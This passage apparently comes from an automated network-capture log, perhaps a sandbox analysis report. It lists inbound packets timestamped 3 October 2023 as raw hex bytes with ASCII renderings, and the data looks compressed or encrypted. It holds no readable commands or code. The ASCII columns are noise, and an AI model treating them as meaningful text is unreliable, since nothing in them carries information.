f5 3a be f5 ec 90 9f 52 9b e1 Data Ascii: r'_lz}(YSfT?vm?#AInOmvb/{b`z:2/A>&KIds7-*aPU'"fX%!ytY>_&53lAV;#uuSq3w{BiCjr"}=;Gv:R
2023-10-03 20:34:59 UTC	465	IN	Data Raw: 6f bf 28 cd 00 8e e8 c3 39 54 c8 e5 7f 08 dd 76 37 bf 91 92 cb b6 cd 12 95 da e2 45 41 0d e5 b3 40 13 eb e0 b0 f1 79 8d 23 8e c6 91 9d c4 e7 f5 f1 8e 1f a2 13 4b 48 16 7d 26 62 2c 72 49 2c e0 4e 82 1f 82 a0 df 9b 10 d6 f4 6e b6 20 7e a1 90 08 51 31 d0 84 8b e6 04 77 60 33 07 25 04 d8 d4 ca 59 5a b9 04 a1 ac 96 2c 03 48 4b 23 ae 27 80 25 62 ea e2 68 31 fb c5 0d 11 38 02 ce 29 e2 8c 32 79 ae 29 01 c1 db 11 a4 f6 3d f0 2b 42 4d 26 32 19 a3 00 a3 43 b0 8c 4c d2 93 cb 26 13 63 17 5a 13 5b 14 17 34 fc 02 e5 28 f4 a5 ef c0 78 a7 9a aa 4d cd 6d 6e 3f d3 50 92 63 84 2b 59 90 91 20 63 a1 59 53 8d b2 8d 14 ea 00 68 62 fb e2 0d 31 38 c5 24 13 71 01 99 14 bb 52 73 80 14 cd bb 2f d4 eb 35 68 75 e1 22 e1 c5 e2 c0 e8 aa 6d 2e 06 2e 52 a2 03 e4 6b 3a a2 91 f8 7c 2d eb 96 Data Ascii: o(9Tv7EA@y#KH}&b,rI,Nn ~Q1w`3%YZ,HK#'%bh18)2y)=+BM&2CL&cZ[4(xMmn?Pc+Y cYShb18$qRs/5hu"m..Rk:\|-
2023-10-03 20:34:59 UTC	481	IN	Data Raw: 32 3b 9a e8 3f 91 7b 64 42 b1 38 1d 12 d1 76 de 5a a4 62 55 fa 90 4f cf 98 6e c5 35 77 4b ee 47 92 c6 98 5e e4 84 81 c9 0c 5f d9 21 7f 8b 9a 26 89 3a c5 09 d8 59 ad aa 5e 1a 56 52 46 a3 5e c2 fe b2 41 15 53 17 4f f9 4e bb dd 85 1d 07 7d 64 49 81 45 15 f5 c3 2c 9b d1 96 9f c4 ad f0 6b 25 5f 67 41 31 1b cf 1f bb ce 72 87 a1 72 a8 58 fb 04 79 ef b0 2d f2 97 19 71 7f c6 83 eb 5f 59 fa af ce 64 95 de 57 52 55 04 e9 e7 8e 8a 4b fd 58 2e 7c de 50 6e 44 e1 17 3a 54 14 22 1a e3 1d 25 29 c6 91 68 e5 a2 5c 9d 10 43 ee ec 44 e0 fa f3 82 42 bd ee 1e 1d d8 9f 64 e7 9a af f1 0d a9 88 f1 79 ea 91 91 4e 80 5a ba ee 1a bb ed 26 e5 10 df a9 36 15 c5 c2 f9 d2 8f 32 d5 e1 fc b4 41 b2 76 da 6f 9b e4 b2 76 6c 76 25 e7 a0 ff 5a bd 0c ee 78 af ea cb de a3 93 3f c8 e9 21 48 29 bf Data Ascii: 2;?{dB8vZbUOn5wKG^_!&:Y^VRF^ASON}dIE,k%_gA1rrXy-q_YdWRUKX.\|PnD:T"%)h\CDBdyNZ&62Avovlv%Zx?!H)
2023-10-03 20:34:59 UTC	497	IN	Data Raw: 3d 1e 9c 71 17 01 56 68 ba f9 e8 59 29 30 3a b1 1a 22 f8 dd f1 a6 2a f8 50 a4 21 10 b1 5f e5 d7 1c 7c 73 15 c9 d3 7e bc 63 5d d9 52 77 2b 55 e6 e5 73 3e 1f 56 ba 20 63 3d af 6d 05 d8 d4 8e dc e9 61 fb bd 74 bb 2d 10 47 9b ef 83 27 6f 1e 5d 54 03 f9 fa cb 86 6a d7 9b ed 26 06 34 55 ad 3c 2b 80 63 2e 32 1d 68 d0 dd 60 36 0f f7 f1 6b 6d 53 3e 48 8c dc 56 fc 8e c0 c1 08 70 f1 8e d1 ea bf a8 aa 62 56 ba 2e ba 56 50 f0 02 3f 06 2e 72 8b a5 21 f8 f1 96 4f 95 9e 8b 96 fd 6a 5c 30 63 24 77 31 f7 cb 39 d9 c0 3f c5 6a ca 3f d2 af 79 f3 7a b0 a1 3f 47 9e e4 dc de 59 55 56 e1 d0 56 5a 18 56 d2 5e 7f 27 cd 67 e9 4c 7d 01 b1 64 44 26 6f 58 5d 8a 76 1c 64 12 ec 66 56 7a 88 cb f8 78 72 47 d0 1d 86 0b 78 2c 29 2b 2e 22 61 dd 32 10 a4 4d e6 95 90 e9 e8 87 eb bd b0 51 65 26 Data Ascii: =qVhY)0:"*P!_\|s~c]Rw+Us>V c=mat-G'o]Tj&4U<+c.2h`6kmS>HVpbV.VP?.r!Oj\0c$w19?j?yz?GYUVVZV^'gL}dD&oX]vdfVzxrGx,)+."a2MQe&
2023-10-03 20:34:59 UTC	513	IN	Data Raw: ca b1 73 b0 0a fd 74 9f fd 0b 3c 60 20 f6 be 01 17 40 a1 e9 93 eb 9a 64 54 8d 7c 3f 67 ee 7a d7 f1 4e a1 df 85 c6 e4 ca bb 4d 0a a3 d0 d0 4e a2 d7 8c 96 56 73 73 97 17 c8 4f 56 bc 7e b6 60 93 54 40 c7 82 9e 69 9d 98 60 96 28 01 a6 e0 78 80 43 52 56 4c b7 f0 81 c2 47 7f 97 2a ec a4 d7 86 90 39 45 68 13 c6 44 9f 80 f2 a1 ad 11 7f e2 f6 3f 99 c0 82 2e dd 0e 56 8b da 04 61 05 6f 08 c1 69 bf 3a cd 7a 33 b0 10 1c 50 af 03 46 e3 a9 bf b3 65 09 dd ba 28 f1 ce f6 c0 59 3f d5 88 cc ff 52 74 1f b1 23 a4 3b a2 36 6d 24 97 36 4d bd 0b b8 10 77 31 5b 38 5d b8 7f c6 1c c9 ee 1e de fa 80 82 9a e0 5c ee b4 71 b0 49 8b 00 0d 0c f0 8a 8d e2 4e f7 4e c0 50 5f b5 69 3e fb 7d 23 10 56 01 cc a6 fb f4 ca 67 58 ee d2 f7 f4 db 2b 51 f6 cf f7 f2 b9 5c 11 c4 45 97 25 e5 3e f8 01 8a Data Ascii: st<` @dT\|?gzNMNVssOV~`T@i`(xCRVLG*9EhD?.Vaoi:z3PFe(Y?Rt#;6m$6Mw1[8]\qINNP_i>}#VgX+Q\E%>
2023-10-03 20:34:59 UTC	529	IN	Data Raw: cc 5d 63 68 13 13 34 02 5d b4 24 48 bd 99 11 66 3c 21 7c 33 d3 02 b4 21 57 41 32 b5 f7 08 94 04 72 0b 2c 05 04 29 bd cf a4 d7 86 80 b2 01 4a 5f 2b ad b2 09 ae 12 26 ae 2b aa 00 80 6b 27 3a 04 af 9e 44 b8 04 84 63 98 8c bf 13 af 4c 6b ef 11 22 04 f6 09 30 0b f6 33 68 e4 07 9f cf d9 5c 24 00 95 40 97 a9 d6 a1 8e c4 9f 89 60 6b 75 23 1c b0 51 fb 65 04 00 a7 09 e1 8b df 29 e8 ad b7 24 61 82 63 80 60 60 48 20 47 7f b6 13 be 44 e0 63 83 8e 00 18 03 16 e0 27 8d 36 12 89 26 01 27 49 8d 62 c0 80 ba 1c 22 0e 6e 71 18 1b 23 ae 04 47 42 d6 13 d1 84 c3 44 a0 f5 5d 14 06 68 a7 5d 33 82 7c a9 87 cf d8 ad 34 80 4a 50 cb d4 d6 50 8d 44 a5 09 20 eb bd 31 05 64 67 46 94 6c 67 da 03 c3 98 99 25 d0 65 6a 91 8b 88 8c 04 96 05 92 e9 b8 8c c0 5d e2 e1 33 76 e9 cb 10 72 eb b3 78 Data Ascii: ]ch4]$Hf<!\|3!WA2r,)J_+&+k':DcLk"03h\$@`ku#Qe)$ac``H GDc'6&'Ib"nq#GBD]h]3\|4JPPD 1dgFlg%ej]3vrx
2023-10-03 20:34:59 UTC	545	IN	Data Raw: f8 d7 60 ce e4 9e b1 d4 ca 80 ff 47 cd 2d bc c8 c9 86 fb 17 88 c5 1a fb 7a 9d be f5 9f 58 de 87 32 46 7e 60 43 bf 04 76 e3 3e c2 11 4f 51 7d 6f d4 d1 d9 e7 a9 05 af 3b cf da 2b f0 cb 88 d7 ab 51 f9 01 16 31 f1 21 f2 48 4b a7 58 db 44 94 ce 64 eb a7 d7 92 d8 c0 98 2d f3 57 6d 6c 1e 41 f6 fb 5f 90 87 69 85 f8 b6 da c5 98 4a 0c e5 eb 3b a1 1b a9 77 07 3f da 07 56 68 5d 86 f7 12 dc 1d b0 d2 62 d9 2c 19 75 df 86 0c bc 55 2b fc bb fa a3 0c 29 9f 77 90 84 f5 bb 14 1d 5d 0b 03 ec ae 49 ca d4 d6 5c f6 6d 3a 7f 58 3a c3 55 b8 5c 70 29 8a 5b 2e 8c 73 dc 94 63 b9 d4 9d ac af da e7 d7 b4 62 66 b0 ce 50 81 ae 7d 44 29 a9 3f df ee eb 7f 09 fe bf bc d6 21 ed 6c a8 73 82 57 99 05 4b b7 14 34 fd bc 3d 1e 7b 96 29 96 94 b1 f5 8b 3c c7 eb ca fd d7 6a 2b bf 7b 0b d5 01 c6 eb Data Ascii: `G-zX2F~`Cv>OQ}o;+Q1!HKXDd-WmlA_iJ;w?Vh]b,uU+)w]I\m:X:U\p)[.scbfP}D)?!lsWK4={)<j+{
2023-10-03 20:34:59 UTC	561	IN	Data Raw: 3b e0 27 b0 cd 95 6f 39 4e 91 fa b0 e7 96 ec 93 7b c9 c8 e5 83 e2 05 ef f2 43 9c 27 1b 6d 00 a4 c6 95 67 35 59 60 f9 2e cf 5a 56 fc bb aa 55 06 8e c3 3d fd f3 e9 51 9c ec 1d 94 cc 04 2d fa 21 42 d0 f3 6b 6f 68 f4 5a 31 a8 19 53 87 2b d2 1e c5 61 65 fb 54 79 1c 0f 4f 52 39 81 f3 b4 7e 21 7a f5 28 e4 4b 32 fe 9c 64 d4 62 68 10 a0 06 d8 78 e6 27 ff 39 c8 81 8e 81 5f 4f fa fc 82 e8 28 a2 c1 7d 21 65 6a 15 78 a7 bb c6 67 f7 ac 32 06 24 45 07 e1 be bd 7c 54 5c 90 f1 26 8a 12 94 c1 b2 58 a1 1a cd c2 a0 62 c6 68 e6 51 ba 55 6c 53 8f b4 21 d1 e6 8a 2c ff 24 bf bd d3 a4 7c 5b 78 17 bc 0b 10 7b 0a 37 56 99 10 d5 d1 a0 6f d9 dd 5e c4 e9 75 be 38 4d 3d cf b1 ee 49 a0 61 b9 41 a2 69 93 96 a0 96 0f 5d 03 28 07 4a 06 c0 29 fb e5 9d 60 86 e1 4e 00 bd 4d d0 80 40 78 10 f0 Data Ascii: ;'o9N{C'mg5Y`.ZVU=Q-!BkohZ1S+aeTyOR9~!z(K2dbhx'9_O(}!ejxg2$E\|T\&XbhQUlS!,$\|[x{7Vo^u8M=IaAi](J)`NM@x
2023-10-03 20:34:59 UTC	577	IN	Data Raw: 94 f7 1e 6a f2 50 cf 19 bb de a0 bc 53 e5 f7 2e 23 c0 9c 52 ec 30 03 fa 57 9d f6 b6 98 b5 88 86 31 72 fe 67 2c e0 1c 51 b7 65 03 6b 5b 43 bd f9 f0 0b 79 eb ff 2e e4 ef 8c 0d 2d 6f ab a2 0b 76 1f 2d c3 e3 ee ce 57 9a eb 30 28 23 53 10 8a 45 31 fa a7 b8 45 7d 30 b5 e1 da 7a 9b 37 d9 68 4c 68 3d 9a 4d 5b 64 07 3d 8e 1b 50 6e 46 cf 63 cc 8b 4b 66 f4 b2 ca e9 cd da e2 77 69 ab eb 0c dd bc 09 45 52 f3 3d 70 f5 0b 4e 26 75 f1 ec 9d bf ef cd 66 cd 3b d2 fb 84 c5 a2 02 7e 03 c0 27 d2 61 d3 67 e0 b6 36 b7 6b e0 9c f4 e7 fb 31 e0 f9 c5 7e 4f de 17 1e 85 64 0d 33 50 be 75 73 08 a8 ab 6d 0d 21 b9 26 87 4f 97 d9 f5 5d 66 0e 43 7c 5d 49 73 01 a4 1d bb 43 c7 a6 2b ad 01 70 23 fc ab 59 f8 cd ec 6e ff ab a3 eb de 59 ea 5c 66 9e 5c ea cd 9a b0 51 58 a8 e1 4b 41 ad 31 a9 0b Data Ascii: jPS.#R0W1rg,Qek[Cy.-ov-W0(#SE1E}0z7hLh=M[d=PnFcKfwiER=pN&uf;~'ag6k1~Od3Pusm!&O]fC\|]IsC+p#YnY\f\QXKA1
2023-10-03 20:34:59 UTC	593	IN	Data Raw: f6 30 04 35 1d 57 f1 2b f7 a5 72 36 00 88 6b 23 09 19 c4 44 b5 d8 a8 cf 73 6f 96 73 5c 7c 55 14 b6 90 52 c3 fc 0d 9b e1 0d e3 c1 31 0e 7c 6b ee cc 25 05 1f 83 9e 0f 69 15 51 b2 e1 4f f1 8b 94 7c bd 6b 24 0c 95 71 bc 5b 59 71 46 a5 1a ee 4c 5e c7 35 0d 10 6b 5d 3e 20 42 6f ee 9f bd c2 32 83 4e c0 91 e2 af ff e1 40 b4 51 f4 8f d3 70 fd ff 40 51 21 14 ca 03 9b 4b e9 be be 72 9c 8c ff 54 93 7d be b6 05 57 35 05 69 86 86 d0 b0 14 05 11 4c c4 5c 91 4c 26 56 c2 4e 14 6a 50 a0 59 c0 82 f6 89 28 60 18 8c d8 4c a3 55 06 bc 08 59 f1 0d b7 c6 ed 9b c0 af a1 ea 78 3a b0 af d4 1b 15 07 ac 07 74 99 26 ec 2b 8b 13 ea 71 6b b5 e7 cf a4 8b 8c 89 4b 59 9e c7 ce b4 ad dc a3 a2 6e be b3 37 8f 06 71 01 4a 82 93 28 1b 3c c2 66 53 22 48 91 70 58 d4 c2 06 0e 61 79 bf b1 ca 02 a4 Data Ascii: 05W+r6k#Dsos\\|UR1\|k%iQO\|k$q[YqFL^5k]> Bo2N@Qp@Q!KrT}W5iL\L&VNjPY(`LUYx:t&+qkKYn7qJ(<fS"HpXay
2023-10-03 20:34:59 UTC	609	IN	Data Raw: f0 44 0d 67 be ab 2f ab 48 04 43 02 49 1e 50 82 2c 88 20 49 44 c9 ff 35 24 8c 16 cc 9a 30 cc d0 44 91 24 c4 e9 88 05 4d a0 3c 2c 84 1e 0c 41 30 45 40 24 ca ef f2 1a 88 60 fd c0 23 29 08 cf 88 21 03 98 50 83 50 c6 45 d4 12 99 03 2a 08 d1 88 26 0a 30 0c 8f a1 46 27 af 9e 08 d2 0f 1d 78 bf f9 08 22 03 8c d1 95 e4 d0 1a da 64 f2 91 c8 1e 42 41 a6 41 14 49 60 d4 e3 21 08 92 88 d2 0f 41 9d 0d 45 b1 60 80 10 c7 90 90 a7 11 53 07 30 e6 0c 7c 7c 90 7d f9 bd 9a 10 45 4f 78 1e e7 43 12 e9 34 fd f4 5e a4 e5 06 51 26 01 16 8f 40 41 90 44 8d 18 39 0e 6b 19 1e d9 2b 13 1a 31 be 34 bc 86 22 84 3f 60 20 4a d2 f4 04 0a c2 2f 45 69 e3 31 24 08 5f fb 43 6b 98 8e 91 e5 ea 14 56 20 9f 70 9b 3c 7d 3c 69 09 9f 14 3f e9 5d fa 28 0b e8 db 68 b2 e7 e9 98 30 1d 86 f2 08 3a 13 a2 42 Data Ascii: Dg/HCIP, ID5$0D$M<,A0E@$`#)!PPE*&0F'x"dBAAI`!AE`S0\|\|}EOxC4^Q&@AD9k+14"?` J/Ei1$_CkV p<}<i?](h0:B
2023-10-03 20:34:59 UTC	625	IN	Data Raw: 78 d1 a5 c2 d5 f4 28 9c 9b 90 d7 b8 cb ed 83 25 00 42 d4 71 77 3b 6e d3 52 5f c8 cf 80 8e 84 4f a7 24 71 d2 31 14 98 56 c7 92 60 53 81 0e 81 16 a6 0d 2a 1c 2a f1 d3 cf 3b 3f 16 51 fe 5f b8 a8 fc 2f 38 44 b3 d2 21 d9 87 f0 a1 21 e1 dc e5 05 79 02 ce 9f 0d 13 70 eb 1b 2b 41 f9 82 eb 46 a7 6c 54 a2 d5 08 92 9c a4 de d2 be e9 43 30 55 5f 24 d1 ad cf 90 1a c9 1a 35 64 69 bb 3b 8b 24 d2 ab fa 4a ad d0 54 93 3e e1 1b bb dd 9b 64 16 74 22 50 06 84 ec 29 c0 e3 8d ad 56 cf 69 d3 1d 3c 54 66 3c 11 e4 e5 de ee f6 8d fa d0 cb 51 48 f5 9f e8 0a d9 ac 82 e7 25 bd ca 6f db 0e 9e f3 dd 0c a7 52 a4 a2 e1 91 0c 24 c7 80 59 51 2b f2 ac 5b df 01 e0 a2 8c c9 89 b9 7e cc 09 39 8d d1 ed 34 de bf 27 1d 74 48 a1 b4 e1 63 b9 14 d7 c1 53 a0 d2 e1 58 0f c8 27 c4 0e 4f ee 64 70 71 22 Data Ascii: x(%Bqw;nR_O$q1V`S**;?Q_/8D!!yp+AFlTC0U_$5di;$JT>dt"P)Vi<Tf<QH%oR$YQ+[~94'tHcSX'Odpq"
2023-10-03 20:34:59 UTC	641	IN	Data Raw: c3 11 4a 74 b7 ac d7 5f 5d f5 14 73 d7 e3 0c 2f d2 21 2b 38 39 8b dd bc 1e f3 94 5e 67 4a b9 6c f5 07 63 48 22 a2 d2 72 d0 72 e7 9c 2d 6f 58 9a 52 87 f4 f0 2a 21 98 54 a3 a8 94 75 72 6f 5e 06 b6 70 73 76 8d de 1a fe 19 54 f1 4b 99 07 26 46 af 7e 73 75 25 b0 1a 6b 38 d7 4e a1 2e f0 47 49 04 28 db 47 08 0a 49 47 d3 bc 11 a5 ab c6 91 f3 83 bd 36 f8 14 e8 e7 68 ec 2c c9 a0 f9 7f 6f 0d ad 2a 38 f5 69 1a 1c 76 7d 56 cb 5c 99 57 ce bc b5 2f ec 67 99 92 60 ca 85 0d 88 6d e9 9c 25 a3 8f 7f 82 6f 42 cc 09 eb 51 82 3f 64 89 16 5e 62 04 98 72 1d 26 4e ec d5 58 d7 7f 20 80 b4 9c 7c e5 a8 74 9f d6 c7 db 1c 97 ae 34 61 be e4 c3 a1 fe cd 35 14 0d aa 82 2a 1f 73 cd a3 7a af 6e 36 4b cf af 2a ee 3c 3d ca c8 7a 6c 88 79 00 95 1d 82 fd 34 ad fe fd 38 7d 5c 72 9f 2f 1f 96 3b Data Ascii: Jt_]s/!+89^gJlcH"rr-oXR!Turo^psvTK&F~su%k8N.GI(GIG6h,o8iv}V\W/g`m%oBQ?d^br&NX \|t4a5szn6K<=zly48}\r/;
2023-10-03 20:34:59 UTC	657	IN	Data Raw: 1a ad cf 92 73 e3 d7 ba 83 35 ae be a4 f6 a7 bb 31 92 d0 03 b0 cb a3 f4 f4 9c a6 3e 70 75 85 c7 3f 22 f4 53 82 3e c6 2f e4 75 bf 0c 78 40 de 30 3c 0a 66 3a 2a 60 02 04 a1 8e 85 68 c3 e0 7f 7f 8b 6c c7 7a 73 a0 99 c0 a6 6c d8 31 df 4e 31 75 52 e8 88 e8 54 e8 57 65 96 53 e0 63 98 2e dd cb 25 0e ab 11 f5 19 3b a6 b6 22 fc d0 91 39 90 6e da e7 10 db b5 ed fb b2 57 3a 22 e5 bf b1 2e eb 3f fd a4 ce b1 bd 6f ef 39 08 a9 4a cf eb e1 f2 51 5b de b5 b7 b6 c8 87 11 09 a6 b5 fd dc 50 d0 06 eb 07 93 d4 1e 22 c2 5b d5 aa 9b 62 c4 3f f8 c0 dc c1 d8 69 6f 79 8c ce 9f ca 91 d7 77 22 68 04 13 5e 98 43 50 7f a2 28 13 12 c0 ae 52 1c 7b 0e 7a 6d cf f5 23 53 cd da 77 a6 74 4d 2c 06 ad 94 ca e1 1a 30 53 f5 62 ec 26 15 eb a1 89 34 94 96 a6 3f a6 02 ca 86 2a 78 16 41 c2 9d d0 fe Data Ascii: s51>pu?"S>/ux@0<f:`hlzsl1N1uRTWeSc.%;"9nW:".?o9JQ[P"[b?ioyw"h^CP(R{zm#SwtM,0Sb&4?xA
2023-10-03 20:34:59 UTC	673	IN	Data Raw: 78 3d c6 28 68 b8 a4 80 32 cd b7 3e 62 a5 44 b8 ba 36 e8 1d ad a3 1c 28 27 2b d1 7a 16 41 d0 fb 62 78 da c5 a6 c4 02 15 d4 ad 80 52 8c 55 dc 18 4a e5 a8 80 71 21 0b 53 d9 06 c5 38 6d 6b ea 1f 77 36 f6 5e bb c7 c3 65 3c 1d a5 57 8b ae 18 f8 77 bd b5 ad 86 6a 9f eb e4 c4 4a c1 50 1c b2 73 3c 18 c5 94 f1 6d d6 55 15 2c 2c 93 6a 90 7d 2d 8c 57 bc 25 22 1b 70 c3 70 3c 87 f0 58 c3 c3 f2 73 1e a3 9a e2 d2 29 af 6d e5 01 c0 40 b9 1b 8d 52 c6 94 0d da 80 e1 a5 6a 08 5a 2f 2c 4f 79 79 ab 73 52 d9 d8 bc 19 1b 6c 1c 0d 9d f1 0f c5 2a 1f d5 23 b0 e3 6c 8f 51 64 84 a8 9b c7 ac aa 37 0d f2 18 9e 89 8a 33 c3 21 4a d6 2f 16 27 b4 16 8b 39 6d 78 11 2e 90 70 49 4f 3c 45 17 44 a6 42 c0 45 46 4b 65 10 08 fc a5 db bf a1 67 6f 8e 6e 4d 8c ae a0 0d 07 47 97 28 cf 28 56 2b 8d 7b Data Ascii: x=(h2>bD6('+zAbxRUJq!S8mkw6^e<WwjJPs<mU,,j}-W%"pp<Xs)m@RjZ/,OyysRl*#lQd73!J/'9mx.pIO<EDBEFKegonMG((V+{
2023-10-03 20:34:59 UTC	689	IN	Data Raw: 00 b1 2b 48 7c 86 24 0e 98 90 f4 3e d3 63 e7 67 32 e5 84 c9 aa f7 20 05 26 62 e7 c9 8a fe 20 7f e0 f9 27 3c f0 3b b0 60 a3 58 1e 59 13 36 44 3c 88 db 01 81 e5 84 fa f7 83 07 89 11 ff ca b1 e6 a0 83 8f 16 3c 0e 26 d8 b8 96 d9 ac 56 ac aa 0e aa 2c 8f cb 0a b0 f5 f0 6e 58 59 9d 3c 2b f3 ff 07 d4 6f 5f e0 89 14 be 03 12 09 31 06 7b f0 f8 45 7f 10 e5 e1 bc 80 3f b0 90 40 8c 79 67 ba 8a 82 cd af ee 56 0a df 5f 8f 54 dd 51 1e 88 5d f6 46 8c 7e 68 24 33 9b 7e 0a f8 26 92 31 5d d7 8c e2 b9 f1 5b e0 81 fc 37 c3 0b 28 88 a6 26 9e dd 91 6b c3 30 cf 8d dc 7a 0c 90 e2 41 92 5e b9 89 62 15 2d 0d 86 f7 eb c2 42 8e 44 d2 e9 66 d3 e3 a6 96 8c a5 44 10 37 a9 36 f2 4a 25 e4 24 92 27 10 49 2d 2c 4c b3 e2 86 3a 35 24 c6 b7 93 49 cd db 20 7c e7 f5 47 40 9f dd 88 72 5e 58 59 02 Data Ascii: +H\|$>cg2 &b '<;`XY6D<<&V,nXY<+o_1{E?@ygV_TQ]F~h$3~&1][7(&k0zA^b-BDfD76J%$'I-,L:5$I \|G@r^XY
2023-10-03 20:34:59 UTC	705	IN	Data Raw: b4 e6 15 e7 6e 93 4e c7 4b a1 b5 5f 28 e2 3c 05 e8 17 a7 a7 45 14 e9 d3 e5 4b 29 c5 79 fc aa c3 90 91 d5 de 6a a7 b4 7e 6a 43 0e ce ce ff 50 8b 43 65 10 79 53 37 10 07 ce ac 53 8c 0b c4 63 31 7a 7c bf d8 fa 05 18 5d 02 11 44 77 91 25 ae cd 9a b8 6d fe 73 80 a8 dc 2e 95 ef 5a 1f dd 56 c2 cb f3 68 d2 f7 74 69 53 18 29 38 31 65 65 9b 09 3c 1c e1 72 7d 01 4e 19 61 77 1f 16 e3 a1 d6 90 0e 3a fa 2b e8 6c 53 bd 01 ec cf 03 5b 78 03 a6 b7 80 1e 01 ab cd b0 70 5a 06 13 99 a8 f6 a8 9f 00 07 8c b3 39 a5 ae f5 b7 37 17 e0 7e 06 cb 35 fa 80 3f d9 09 56 4c d4 66 4d 6d 99 cb e4 72 90 69 c5 97 7f 7d 4e d0 cd 1c 0f 30 4e a0 6d 2c bf bf 83 16 1b 45 44 0c db 71 01 66 d7 d2 e0 06 e4 b7 41 cc c1 5e af 49 c7 e7 3f c4 61 6a 54 99 25 cb 5a 25 48 8b ce 9d 68 51 0f ea a4 2b 5b 26 Data Ascii: nNK_(<EK)yj~jCPCeyS7Sc1z\|]Dw%ms.ZVhtiS)81ee<r}Naw:+lS[xpZ97~5?VLfMmri}N0Nm,EDqfA^I?ajT%Z%HhQ+[&
2023-10-03 20:34:59 UTC	721	IN	Data Raw: 25 13 d9 9c e0 ce c2 53 5a 0e 4e a8 6e 61 12 0f b3 a7 17 8f 8d 43 3a 84 74 b5 d2 be bc 07 21 fb 88 45 07 a6 d5 14 d9 7e 04 b1 43 15 41 c3 a1 15 50 c2 a1 86 ad ec 1a 40 64 7a 56 ef 93 3d 8c bd d2 ed dd 0f f6 79 38 9a f6 1d 5e 27 2d d9 4b db 3e c5 70 f2 6a d7 93 bd 97 e7 77 df 68 f8 bc 14 5b c2 af ac f1 26 1f a3 44 c2 41 85 75 f6 e2 5d 1a 68 1b 9e 95 2e 4c 02 32 69 b3 44 83 01 9d 78 37 83 75 c6 07 90 72 d9 d0 8b 01 a4 53 63 1a 14 48 98 e9 02 d1 f4 ab 92 1a 70 a2 f8 a5 29 12 f4 c2 3d 50 3f f7 09 7e ba 36 04 f8 f7 34 84 6d 54 b6 0c 78 1a e1 39 e0 e0 60 86 b2 6c 0d 29 27 a8 a8 ce 64 a9 48 2d 4e c9 95 2d 81 00 41 05 26 53 6b 55 cf 40 4c f5 96 d2 05 4f 2e 9a 51 e0 d3 64 bd 30 24 59 22 20 1b e4 e9 bf ad 89 d0 e8 46 1b 59 64 5a 4e 03 c1 3a 34 de 15 e8 09 a2 de 0a Data Ascii: %SZNnaC:t!E~CAP@dzV=y8^'-K>pjwh[&DAu]h.L2iDx7urScHp)=P?~64mTx9`l)'dH-N-A&SkU@LO.Qd0$Y" FYdZN:4
2023-10-03 20:34:59 UTC	737	IN	Data Raw: 0a b3 5f 9a 7b c3 e8 c2 f5 b8 7d 7d 8d 33 c0 7d 9b 53 50 40 71 59 cf 58 35 26 15 3a 18 b8 12 df f5 fc 61 8c 92 86 a1 ff 2f c1 2e 7b fe 8e bd 73 ef 37 21 e3 d3 29 d6 c5 a7 16 5b 75 7f 2c 06 22 a8 53 2b 3d 17 fd 0b ac 75 09 6a 97 d1 68 58 c2 77 12 43 28 8e 88 b1 e6 57 50 da c9 63 42 8e 06 5d 7b 23 6b bc a3 4c 1a bd 4f 30 98 f7 b0 01 51 e4 bb a8 9a 6c 70 d3 46 97 50 b2 70 53 f6 3e e4 ec 97 52 40 aa 73 02 fd f1 60 88 9c 03 8c e0 5a 42 0e 6c c9 08 f7 a8 9c a4 10 67 a9 d5 3e 7a ea 00 36 0d f5 92 43 ab 4d ac 53 3f 0d 42 62 04 fb c4 cd db e7 5e 92 e9 cb 11 35 89 59 3d c3 48 4e 98 1d 64 1e f3 57 01 71 6d d6 c4 08 84 3e 3a e7 f8 43 6e f4 4d de 29 7d 00 e0 65 bb 2d 6f 4f 74 8d dc 50 43 4d df 20 4a b6 42 81 20 cf 78 9b 58 dd 65 ea ec 1e 1a 0f 1b 4b 17 58 67 58 93 07 Data Ascii: _{}}3}SP@qYX5&:a/.{s7!)[u,"S+=ujhXwC(WPcB]{#kLO0QlpFPpS>R@s`ZBlg>z6CMS?Bb^5Y=HNdWqm>:CnM)}e-oOtPCM JB xXeKXgX
2023-10-03 20:34:59 UTC	753	IN	Data Raw: 62 3f 13 af 89 54 c2 10 3b 89 2f 81 56 f2 44 25 b7 4c a3 56 a3 22 a5 c5 08 f6 12 1a ab ae fb fc d8 1b ae 98 b6 4b 30 f4 1c ea 5b 01 d2 6f e7 4d a0 8f 1b 7e c7 17 1c 55 d7 de 8d 93 26 d2 b2 ca 7e 98 d0 91 81 02 d1 87 22 90 22 f1 c4 33 d7 bc 9d e1 df d1 ef 07 cc 5a b4 dc 11 35 9e b0 44 fa 48 8e 87 20 fa 41 a7 b7 c6 11 7f 2f 07 07 43 54 84 6c 6d 09 f0 2a bb b3 10 93 a6 11 06 4b 34 0f 1b 76 33 97 69 fc 35 d2 1e be 20 90 09 4a ea 7c db cb 84 48 c3 c5 71 41 87 e0 1c 54 18 01 ea b0 4d 39 6d 0f 51 3e cf d7 05 c3 4e 22 db f3 21 91 89 b6 2c 61 7a c8 e1 94 02 b5 44 ec cf 5a 07 8b 22 7d 99 d1 d5 68 a1 f6 99 ee 7a de ca c9 de 0a a9 ac 2a ac a2 02 55 12 e7 cf 26 00 99 2f 1b 83 16 1b fe 4a 3f 56 d4 45 bf b1 e5 9d 67 92 1b 7e 9d 0b 6c 43 3d ae 12 bc 33 34 58 f0 61 73 e2 Data Ascii: b?T;/VD%LV"K0[oM~U&~""3Z5DH A/CTlmK4v3i5 J\|HqATM9mQ>N"!,azDZ"}hzU&/J?VEg~lC=34Xas
2023-10-03 20:34:59 UTC	769	IN	Data Raw: 17 07 a8 06 b7 52 f3 96 f6 f7 f5 45 81 4a 32 85 bd 3c 08 3b ec 4a ea b7 f7 e0 ff f8 34 d4 67 91 50 dd bb 20 77 8f 04 37 12 cb 91 55 3f 60 6f 77 00 6a 4f 44 95 e9 19 86 67 17 87 36 43 b9 e7 bc 3f 83 6c 1f d7 79 b4 78 fc a6 63 64 eb 99 0f e5 a2 bf 4e 54 37 b9 b4 d3 09 52 96 33 59 9f 5a 32 4d 65 f7 11 63 47 ff ac b8 fa f8 63 90 83 82 eb 42 f5 65 8c 74 bf 6f 6a d7 62 e5 41 f7 bd c9 7c e9 ac 64 ea 7d bc 34 de d9 bd 8b cd 8c 4a 87 98 43 23 05 db 15 13 4f 2a 61 fa 8e 01 a0 d4 33 35 14 6d 32 be 80 ff de 4d e3 c1 1f ca 6a 98 f7 e2 a0 63 5b 7d 0f 01 e1 c2 2b 61 11 d1 50 29 5c 84 81 6e ed 46 4f df b2 b0 47 f1 79 0e ef 10 b4 0a 82 bb ad 91 ab e5 0c 65 fd 7f 6b 09 8e 31 ac c2 be 92 84 48 da 75 28 